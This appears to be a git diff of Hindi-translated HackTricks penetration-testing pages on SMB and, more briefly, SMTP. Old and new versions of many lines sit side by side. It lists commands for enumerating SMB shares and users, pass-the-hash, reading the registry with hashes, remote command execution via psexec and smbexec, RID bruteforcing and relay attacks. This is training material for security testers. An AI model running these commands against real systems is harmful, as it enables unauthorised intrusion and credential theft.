एक SMB सर्वर **अपनी स्थानीय फाइल सिस्टम के मनमाने भागों को शेयर्स के रूप में प्रदान कर सकता है**। इसलिए क्लाइंट को दिखाई देने वाली **हायरार्की** आंशिक रूप से **स्वतंत्र** होती है **सर्वर** पर **संरचना** से। **पहुंच अधिकार** `Access Control Lists` (`ACL`) द्वारा परिभाषित किए जाते हैं। वे व्यक्तिगत उपयोगकर्ताओं या उपयोगकर्ता समूहों के लिए **`execute`**, **`read`**, और **`full access`** जैसे गुणों के आधार पर **सूक्ष्म तरीके से नियंत्रित** किए जा सकते हैं**ACLs** **शेयर्स के आधार पर** परिभाषित किए जाते हैं और इसलिए वे सर्वर पर स्थानीय रूप से सौंपे गए अधिकारों से मेल नहीं खाते हैं।
### IPC$ शेयर
पुस्तक _**नेटवर्क सिक्योरिटी असेसमेंट 3rd संस्करण**_ से
पुस्तक _**Network Security Assessment 3rd edition**_ से
एक अनाम नल सत्र के साथ आप IPC$ शेयर तक पहुंच सकते हैं और नामित पाइप्स के माध्यम से प्रदर्शित सेवाओं के साथ बातचीत कर सकते हैं। Kali Linux के भीतर enum4linux उपयोगिता विशेष रूप से उपयोगी है; इसके साथ, आप निम्नलिखित प्राप्त कर सकते हैं:
एक अनाम नल सत्र के साथ आप IPC$ शेयर तक पहुंच सकते हैं और नामित पाइपों के माध्यम से उजागर की गई सेवाओं के साथ बातचीत कर सकते हैं। Kali Linux के भीतर enum4linux उपयोगिता विशेष रूप से उपयोगी है; इसके साथ, आप निम्नलिखित प्राप्त कर सकते हैं:
* ऑपरेटिंग सिस्टम की जानकारी
* मूल डोमेन का विवरण
@ -47,7 +49,7 @@
## NTLM क्या है
यदि आप नहीं जानते कि NTLM क्या है या आप जानना चाहते हैं कि यह कैसे काम करता है और इसका दुरुपयोग कैसे किया जा सकता है, तो आपको **NTLM** के बारे में यह पृष्ठ बहुत रोचक लगेगा जहां इस प्रोटोकॉल के काम करने के तरीके और इसका लाभ कैसे उठाया जा सकता है, इसकी व्याख्या की गई है:
यदि आप नहीं जानते कि NTLM क्या है या आप जानना चाहते हैं कि यह कैसे काम करता है और इसका दुरुपयोग कैसे किया जा सकता है, तो आपको **NTLM** के बारे में यह पृष्ठ बहुत दिलचस्प लगेगा जहां इस प्रोटोकॉल के काम करने के तरीके और आप इसका लाभ कैसे उठा सकते हैं, इसकी व्याख्या की गई है:
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
@ -128,7 +130,7 @@ rpcclient -U "username%passwd" <IP> #With creds
```
### उपयोगकर्ताओं, समूहों और लॉग इन उपयोगकर्ताओं का परिगणन करें
यह जानकारी पहले से ही enum4linux और enum4linux-ng से एकत्रित की जा चुकी होनी चाहिए
यह जानकारी पहले से ही enum4linux और enum4linux-ng से एकत्रित की जा रही होनी चाहिए
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -176,7 +178,7 @@ run
### साझा फ़ोल्डर्स की सूची
यह हमेशा सिफारिश की जाती है कि देखें कि क्या आप कुछ भी एक्सेस कर सकते हैं, यदि आपके पास प्रमाण-पत्र नहीं हैं तो **null** **प्रमाण-पत्र/अतिथि उपयोगकर्ता** का प्रयास करें।
यह हमेशा सिफारिश की जाती है कि देखें आप कुछ तक पहुँच सकते हैं या नहीं, यदि आपके पास प्रमाण-पत्र नहीं हैं तो **null** **प्रमाण-पत्र/अतिथि उपयोगकर्ता** का प्रयास करें।
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -202,9 +204,9 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **विंडोज शेयर्स को मैन्युअली एन्युमरेट करें और उनसे कनेक्ट करें**
### **विंडोज शेयर्स का मैन्युअल रूप से परीक्षण करना और उनसे जुड़ना**
यह संभव है कि आपको होस्ट मशीन के किसी भी शेयर्स को प्रदर्शित करने से प्रतिबंधित किया गया हो और जब आप उन्हें सूचीबद्ध करने का प्रयास करते हैं तो ऐसा प्रतीत होता है मानो कोई शेयर्स कनेक्ट करने के लिए नहीं हैं। इसलिए यह एक प्रयास के लायक हो सकता है कि आप मैन्युअली किसी शेयर से कनेक्ट करने का प्रयास करें। शेयर्स को मैन्युअली एन्युमरेट करने के लिए आपको वैध सत्र का उपयोग करते समय NT\_STATUS\_ACCESS\_DENIED और NT\_STATUS\_BAD\_NETWORK\_NAME जैस प्रतिक्रियाओं की तलाश करनी चाहिए (उदाहरण के लिए null session या वैध क्रेडेंशियल्स)। ये संकेत दे सकते हैं कि शेयर मौजूद है और आपको उस तक पहुँच नहीं है या शेयर बिलकुल भी मौजूद नहीं है।
यह संभव है कि आपको होस्ट मशीन के किसी भी शेयर्स को प्रदर्शित करने से प्रतिबंधित किया गया हो और जब आप उन्हें सूचीबद्ध करने का प्रयास करते हैं तो ऐसा प्रतीत होता है कि जुड़ने के लिए कोई शेयर्स नहीं हैं। इसलिए यह एक प्रयास के लायक हो सकता है कि आप मैन्युअल रूप से किसी शेयर से जुड़ने का प्रयास करें। शेयर्स को मैन्युअल रूप से परीक्षण करने के लिए आपको वैध सत्र का उपयोग करते समय NT\_STATUS\_ACCESS\_DENIED और NT\_STATUS\_BAD\_NETWORK\_NAME जैस प्रतिक्रियाओं की तलाश करनी चाहिए (उदाहरण के लिए null session या वैध प्रमाण-पत्र)। ये संकेत दे सकते हैं कि शेयर मौजूद है और आपको उस तक पहुँच नहीं है या शेयर बिलकुल भी मौजूद नहीं है।
विंडोज लक्ष्यों के लिए सामान्य शेयर नाम हैं
@ -219,7 +221,7 @@ smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-t
(सामान्य शेयर नाम _**Network Security Assessment 3rd edition**_ से)
आप निम्नलिखित कमांड का उपयोग करके उनसे कनेक्ट करने का प्रयास कर सकते हैं
आप निम्नलिखित कमांड का उपयोग करके उनसे जुड़ने का प्रयास कर सकते हैं
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
@ -272,18 +274,16 @@ fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
```markdown
explorer.exe (ग्राफिकल), उपलब्ध नॉन-हिडन शेयर्स देखने के लिए `\\<ip>\` दर्ज करें।
### एक साझा फ़ोल्डर माउंट करें
```
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **फाइलें डाउनलोड करें**
प्रमाणीकरण/Pass-the-Hash के साथ कनेक्ट करने के लिए पिछले अनुभागों को पढ़ें।
प्रमाणीकरण साख/Pass-the-Hash के साथ कनेक्ट करने के तरीके जानने के लिए पिछले अनुभागों को पढ़ें।
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
@ -319,16 +319,14 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
शेयर्स में विशेष रूप से दिलचस्प फाइलें **`Registry.xml`** होती हैं क्योंकि इनमें उपयोगकर्ताओं के लिए **पासवर्ड हो सकते हैं** जो Group Policy के माध्यम से **autologon** के साथ कॉन्फ़िगर किए गए हैं। या **`web.config`** फाइलें क्योंकि इनमें क्रेडेंशियल्स होते हैं।
{% hint style="info" %}
**SYSVOL share** डोमेन में सभी प्रमाणित उपयोगकर्ताओं द्वारा **पढ़ा जा सकता है**। वहां आपको कई अलग-अलग बैच, VBScript, और PowerShell **स्क्रिप्ट्स** मिल सकती हैं।\
आपको इसके अंदर की **स्क्रिप्ट्स** की जांच करनी चाहिए क्योंकि आपको **पासवर्ड** जैसी संवेदनशील जानकारी मिल सकती है
**SYSVOL share** सभी प्रमाणित उपयोगकर्ताओं द्वारा पढ़ा जा सकता है। वहां आपको कई अलग-अलग batch, VBScript, और PowerShell **स्क्रिप्ट्स** मिल सकती हैं।\
आपको इसके अंदर की **स्क्रिप्ट्स** की जांच करनी चाहिए क्योंकि आपको संवेदनशील जानकारी जैसे **पासवर्ड** मिल सकते हैं
{% endhint %}
## रजिस्ट्री पढ़ें
आप कुछ पता चले क्रेडेंशियल्स का उपयोग करके **रजिस्ट्री पढ़ने** में सक्षम हो सकते हैं। Impacket **`reg.py`** आपको प्रयास करने की अनुमति देता है:
आप कुछ पता चले हुए क्रेडेंशियल्स का उपयोग करके **रजिस्ट्री पढ़** सकते हैं। Impacket **`reg.py`** आपको प्रयास करने की अनुमति देता है:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
@ -340,22 +338,22 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
| **सेटिंग** | **विवरण** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | क्या वर्तमान शेयर में उपलब्ध शेयर्स की सूची दिखाई जानी चाहिए? |
| `browseable = yes` | क्या वर्तमान शेयर में उपलब्ध शेयर्स की सूची दिखाई जाए? |
| `read only = no` | क्या फाइलों के निर्माण और संशोधन की अनुमति नहीं है? |
| `writable = yes` | क्या उपयोगकर्ताओं को फाइलें बनाने और संशोधित करने की अनुमति है? |
| `guest ok = yes` | क्या बिना पासवर्ड के सेवा से जुड़ने की अनुमति है? |
| `enable privileges = yes` | क्या विशिष्ट SID को आवंटित विशेषाधिकारों का सम्मान करना चाहिए? |
| `create mask = 0777` | नवनिर्मित फाइलों को किन अनुमतियों को आवंटित किया जाना चाहिए? |
| `directory mask = 0777` | नवनिर्मित निर्देशिकाओं को किन अनुमतियों को आवंटित किया जाना चाहिए? |
| `logon script = script.sh` | उपयोगकर्ता के लॉगिन पर कौन सी स्क्रिप्ट को निष्पादित किया जाना चाहिए? |
| `magic script = script.sh` | स्क्रिप्ट बंद होने पर कौन सी स्क्रिप्ट को निष्पादित किया जाना चाहिए? |
| `enable privileges = yes` | क्या विशिष्ट SID को आवंटित विशेषाधिकारों का सम्मान करना है? |
| `create mask = 0777` | नवनिर्मित फाइलों को किन अनुमतियों का आवंटन किया जाना चाहिए? |
| `directory mask = 0777` | नवनिर्मित निर्देशिकाओं को किन अनुमतियों का आवंटन किया जाना चाहिए? |
| `logon script = script.sh` | उपयोगकर्ता के लॉगिन पर कौन सी स्क्रिप्ट निष्पादित की जानी चाहिए? |
| `magic script = script.sh` | स्क्रिप्ट बंद होने पर कौन सी स्क्रिप्ट निष्पादित की जानी चाहिए? |
| `magic output = script.out` | मैजिक स्क्रिप्ट के आउटपुट को कहाँ संग्रहित किया जाना चाहिए? |
कमांड `smbstatus` **सर्वर** के बारे में और **कौन जुड़ा हुआ है** इसके बारे में जानकारी देता है।
कमांड `smbstatus` **सर्वर** के बारे में और **कौन जुड़ा हुआ है** इसक जानकारी देता है।
## केर्बेरोस का उपयोग करके प्रमाणीकरण
आप **केर्बेरोस** में **प्रमाणीकरण** कर सकते हैं उपकरणों **smbclient** और **rpcclient** का उपयोग करके:
आप **केर्बेरोस** में **प्रमाणीकरण** कर सकते हैं उपकरण **smbclient** और **rpcclient** का उपयोग करके:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
@ -364,7 +362,7 @@ rpcclient -k ws01win10.domain.com
### **crackmapexec**
crackmapexec **mmcexec, smbexec, atexec, wmiexec** में से किसी का भी उपयोग करके आदेश निष्पादित कर सकता है, जिसमें **wmiexec** **डिफ़ॉल्ट** विधि है। आप अपनी पसंदीदा विकल्प का उपयोग करने के लिए पैरामीटर `--exec-method` के साथ संकेत कर सकते हैं:
crackmapexec **mmcexec, smbexec, atexec, wmiexec** में से किसी का भी उपयोग करके आदेश निष्पादित कर सकता है, जिसमें **wmiexec** **डिफ़ॉल्ट** विधि है। आप `--exec-method` पैरामीटर के साथ अपनी पसंद का विकल्प इंगित कर सकते हैं:
```bash
apt-get install crackmapexec
@ -388,7 +386,7 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
दोनों विकल्प पीड़ित मशीन में एक नई सेवा **बनाएंगे** (_\pipe\svcctl_ का उपयोग करके SMB के माध्यम से) और इसका उपयोग कुछ **निष्पादित करने** के लिए करेंगे (**psexec** ADMIN$ शेयर पर एक निष्पादन योग्य फ़ाइल **अपलोड** करेगा और **smbexec** **cmd.exe/powershell.exe** की ओर इशारा करेगा और तर्कों में पेलोड डालेगा --**फ़ाइल-रहित तकनीक-**-).\
दोनों विकल्प पीड़ित मशीन में एक नई सेवा बनाएंगे (SMB के माध्यम से _\pipe\svcctl_ का उपयोग करके) और इसका उपयोग कुछ **निष्पादित करने** के लिए करेंगे (**psexec** एक निष्पादन योग्य फ़ाइल को ADMIN$ शेयर पर **अपलोड** करेगा और **smbexec** **cmd.exe/powershell.exe** की ओर इशारा करेगा और तर्कों में पेलोड डालेगा --**फ़ाइल-रहित तकनीक**--).\
**अधिक जानकारी** के लिए [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) और [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
**kali** में यह /usr/share/doc/python3-impacket/examples/ पर स्थित है।
```bash
@ -438,12 +436,12 @@ ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rid
```
## SMB रिले अटैक
यह अटैक Responder टूलकिट का उपयोग करके आंतरिक नेटवर्क पर **SMB प्रमाणीकरण सत्रों को कैप्चर करता है**, और उन्हें **लक्ष्य मशीन** पर **रिले** करता है। यदि प्रमाणीकरण **सत्र सफल होता है**, तो यह स्वचालित रूप से आपको एक **सिस्टम** **शेल** में ले जाएगा।\
यह अटैक Responder टूलकिट का उपयोग करके आंतरिक नेटवर्क पर **SMB प्रमाणीकरण सत्रों को कैप्चर** करता है, और उन्हें एक **लक्ष्य मशीन** पर **रिले** करता है। यदि प्रमाणीकरण **सत्र सफल होता है**, तो यह स्वचालित रूप से आपको एक **सिस्टम** **शेल** में ले जाएगा।\
[**इस अटैक के बारे में अधिक जानकारी यहाँ।**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Windows लाइब्रेरी URLMon.dll स्वचालित रूप से होस्ट के प्रति प्रमाणीकरण का प्रयास करती है जब कोई पेज SMB के माध्यम से कुछ सामग्री तक पहुँचने की कोशिश करता है, उदाहरण के लिए: `img src="\\10.10.10.10\path\image.jpg"`
Windows लाइब्रेरी URLMon.dll स्वचालित रूप से होस्ट के प्रति प्रमाणीकरण का प्रयास करती है जब कोई पेज SMB के माध्यम से कुछ सामग्री तक पहुँचने का प्रयास करता है, उदाहरण के लिए: `img src="\\10.10.10.10\path\image.jpg"`
यह निम्नलिखित फंक्शन्स के साथ होता है:
@ -454,11 +452,11 @@ Windows लाइब्रेरी URLMon.dll स्वचालित रू
जिनका उपयोग कुछ ब्राउज़रों और टूल्स (जैसे Skype) द्वारा किया जाता है
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
![से: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
### SMBTrap का उपयोग करते हुए MitMf
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
![से: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>)
## NTLM चोरी
@ -537,12 +535,14 @@ Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप **PEASS के नवीनतम संस्करण तक पहुँच चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter पर** मुझे **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में.
</details>

499
network-services-pentesting/pentesting-smtp/README.md
View file

@ -1,132 +1,50 @@
# 25,465,587 - पेंटेस्टिंग SMTP/s
# **मूल जानकारी**
<details>
**SMTP (सिंपल मेल ट्रांसफर प्रोटोकॉल)** एक TCP/IP प्रोटोकॉल है जिसका उपयोग **ई-मेल भेजने** और प्राप्त करने में किया जाता है। हालांकि, चूंकि यह प्राप्ति के अंत में संदेशों को कतारबद्ध करने में सीमित है, इसलिए इसका आमतौर पर दो अन्य प्रोटोकॉलों, POP3 या IMAP के साथ उपयोग किया जाता है, जो उपयोगकर्ता को सर्वर मेलबॉक्स में संदेशों को सहेजने और समय-समय पर सर्वर से उन्हें डाउनलोड करने देते हैं।
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>
<figure><img src="../../.gitbook/assets/image (1) (1) (2) (4).png" alt=""><figcaption></figcaption></figure>
[**DragonJAR Security Conference es un evento internacional de ciberseguridad**](https://www.dragonjarcon.org/) con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.\
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
{% embed url="https://www.dragonjarcon.org/" %}
## **मूलभूत जानकारी**
**SMTP (Simple Mail Transfer Protocol)** एक TCP/IP प्रोटोकॉल है जिसका उपयोग **ईमेल भेजने** और **प्राप्त करने** में किया जाता है। हालांकि, यह प्राप्ति स्थान पर संदेशों को कतार में रखने की क्षमता में सीमित होने के कारण, यह आमतौर पर दो अन्य प्रोटोकॉलों, POP3 या IMAP के साथ उपयोग किया जाता है, जो उपयोगकर्ता को संदेशों को सर्वर मेलबॉक्स में सहेजने और नियमित अंतराल पर सर्वर से उन्हें डाउनलोड करने की अनुमति देते हैं।
अन्य शब्दों में, **उपयोगकर्ता आमतौर पर** एक प्रोग्राम का उपयोग करते हैं जो **ईमेल भेजने के लिए SMTP का उपयोग** करता है और या तो **ईमेल प्राप्त करने के लिए POP3 या IMAP का उपयोग** करता है। Unix-आधारित सिस्टमों पर, **sendmail** ईमेल के लिए सबसे अधिक उपयोग किया जाने वाला SMTP सर्वर है। एक वाणिज्यिक पैकेज, Sendmail, में एक POP3 सर्वर शामिल है। **Microsoft Exchange** में एक SMTP सर्वर शामिल है और POP3 समर्थन भी किया जा सकता है।\
यहां से [यहां](https://whatis.techtarget.com/definition/SMTP-Simple-Mail-Transfer-Protocol)।
दूसरे शब्दों में, **उपयोगकर्ता आमतौर पर** एक प्रोग्राम का उपयोग करते हैं जो **SMTP का उपयोग करके ई-मेल भेजने** और **POP3 या IMAP का उपयोग करके ई-मेल प्राप्त करने** के लिए करता है। Unix-आधारित सिस्टमों पर, **sendmail** ई-मेल के लिए सबसे अधिक उपयोग किया जाने वाला SMTP सर्वर है। एक वाणिज्यिक पैकेज, Sendmail, में एक POP3 सर्वर शामिल है। **Microsoft Exchange** में एक SMTP सर्वर शामिल है और इसे POP3 समर्थन शामिल करने के लिए भी सेटअप किया जा सकता है।\
[यहाँ से](https://whatis.techtarget.com/definition/SMTP-Simple-Mail-Transfer-Protocol).
**डिफ़ॉल्ट पोर्ट:** 25,465(ssl),587(ssl)
```
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Microsoft ESMTP 6.0.3790.3959
```
### ईमेल हडर्स
### ईमेल हेडर्स
यदि आपको मौका मिलता है कि आप **पीड़ित को ईमेल भेजें** (उदाहरण के लिए वेब पृष्ठ के संपर्क फ़ॉर्म के माध्यम से), तो इसे करें क्योंकि **आप ईमेल के हैडर्स को देखकर पीड़ित की आंतरिक टोपोलॉजी के बारे में जान सकते हैं**
यदि आपके पास **पीड़ित से ईमेल प्राप्त करने का अवसर हो** (उदाहरण के लिए वेब पेज के संपर्क फॉर्म के माध्यम से), तो इसे करें क्योंकि आप **पीड़ित की आंतरिक टोपोलॉजी के बारे में जान सकते हैं** ईमेल के हेडर्स को देखकर।
आप एक SMTP सर्वर से भी एक ईमेल प्राप्त कर सकते हैं जब वह सर्वर एक अस्तित्व नहीं रखने वाले पते पर ईमेल भेजने का प्रयास करता है (क्योंकि सर्वर द्वारा अपराधी को एक NDN ईमेल भेजेगा)। लेकिन, सुनिश्चित करें कि आप ईमेल को एक अनुमति प्राप्त पते से भेजते हैं (SPF नीति की जांच करें) और आप NDN संदेश प्राप्त कर सकते हैं।
आप एक SMTP सर्वर से भी ईमेल प्राप्त कर सकते हैं, एक गैर-मौजूद पते पर ईमेल **भेजने का प्रयास करके** (क्योंकि सर्वर हमलावर को NDN मेल भेजेगा)। लेकिन, सुनिश्चित करें कि आप ईमेल एक अनुमत पते से भेज रहे हैं (SPF नीति की जांच करें) और आप NDN संदेश प्राप्त कर सकते हैं।
आपको भी कोशिश करनी चाहिए कि **विभिन्न सामग्री भेजें क्योंकि आप हैडर्स पर और रोचक जानकारी पा सकते हैं** जैसे: `X-Virus-Scanned: by av.domain.com`\
आपको EICAR परीक्षण फ़ाइल भेजनी चाहिए।\
**AV** का पता लगाना आपको **ज्ञात सुरक्षा दुरुपयोग** करने में सक्षम बना सकता है।
आपको विभिन्न सामग्रियों को **भेजने का भी प्रयास करना चाहिए क्योंकि आप हेडर्स में अधिक रोचक जानकारी पा सकते हैं** जैसे: `X-Virus-Scanned: by av.domain.com`\
आपको EICAR टेस्ट फाइल भेजनी चाहिए।\
**AV** का पता लगाने से आप **ज्ञात कमजोरियों का शोषण कर सकते हैं।**
## मूलभूत कार्रवाई
## मूल क्रियाएँ
### **बैनर ग्रबिंग / मूलभूत कनेक्शन**
### **बैनर ग्रैबिंग/मूल कनेक्शन**
**SMTP:**
```bash
nc -vn <IP> 25
```
**SMTPS**:
SMTPS (Secure SMTP) एक सुरक्षित प्रोटोकॉल है जो ईमेल के लिए इस्तेमाल होता है। यह SMTP (Simple Mail Transfer Protocol) का एक सुरक्षित संस्करण है जो डेटा को एन्क्रिप्ट करने के लिए SSL (Secure Sockets Layer) या TLS (Transport Layer Security) का उपयोग करता है। SMTPS का उपयोग करके, ईमेल के लिए सुरक्षित और गोपनीय संचार सुनिश्चित किया जाता है।
यहां कुछ SMTPS के महत्वपूर्ण बिंदु हैं:
- SMTPS का डेटा एन्क्रिप्टेड होता है, जिससे अनधिकृत पहुंच से बचा जा सकता है।
- SMTPS के लिए SSL या TLS प्रोटोकॉल का उपयोग किया जाता है, जो सुरक्षित संचार की सुनिश्चितता प्रदान करता है।
- SMTPS का उपयोग करके, ईमेल सर्वर और क्लाइंट के बीच सुरक्षित तंत्र स्थापित किया जा सकता है।
- SMTPS के लिए एक अलग पोर्ट (आमतौर पर 465) का उपयोग किया जाता है।
यदि आप SMTPS को पेंटेस्ट करना चाहते हैं, तो आपको इसके सुरक्षा गवाहों, कंफिगरेशन और संचार प्रोटोकॉल के बारे में अच्छी जानकारी होनी चाहिए। आप विभिन्न टेक्निकल टूल्स और तकनीकों का उपयोग करके SMTPS के सुरक्षा और गोपनीयता को परीक्षण कर सकते हैं।
**SMTPS**:
```bash
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
```
### किसी संगठन के MX सर्वर खोजना
To find the MX servers of an organization, you can use the following methods:
#### Method 1: DNS Lookup
Perform a DNS lookup for the organization's domain using the `nslookup` command or an online DNS lookup tool. Look for the MX records in the DNS response. These records will provide you with the names of the MX servers.
#### Method 2: SMTP Enumeration
Use SMTP enumeration techniques to identify the MX servers. This involves connecting to the SMTP port (port 25) of the organization's mail server and querying it for the list of accepted email addresses. The server's response will contain the names of the MX servers.
#### Method 3: Online Tools
There are various online tools available that can help you find the MX servers of an organization. These tools perform DNS lookups and provide you with the MX records.
Once you have obtained the MX server names, you can proceed with further analysis and testing to identify potential vulnerabilities or misconfigurations in the organization's email infrastructure.
### संगठन के MX सर्वर्स का पता लगाना
```bash
dig +short mx google.com
```
### जांच
SMTP सेवा को पेंटेस्ट करने के लिए, पहले हमें उसकी जांच करनी होगी। यहां कुछ जांच करने के तरीके दिए गए हैं:
#### 1. SMTP वेब सर्वर का पता लगाएं
SMTP सर्वर का पता लगाने के लिए, हम निम्नलिखित तकनीकों का उपयोग कर सकते हैं:
- DNS लुकअप: डोमेन के लिए MX रिकॉर्ड देखें और SMTP सर्वर का पता लगाएं।
- नेटवर्क स्कैनिंग: नेटवर्क स्कैनर का उपयोग करें और SMTP सर्वर के लिए खुले पोर्ट्स का पता लगाएं।
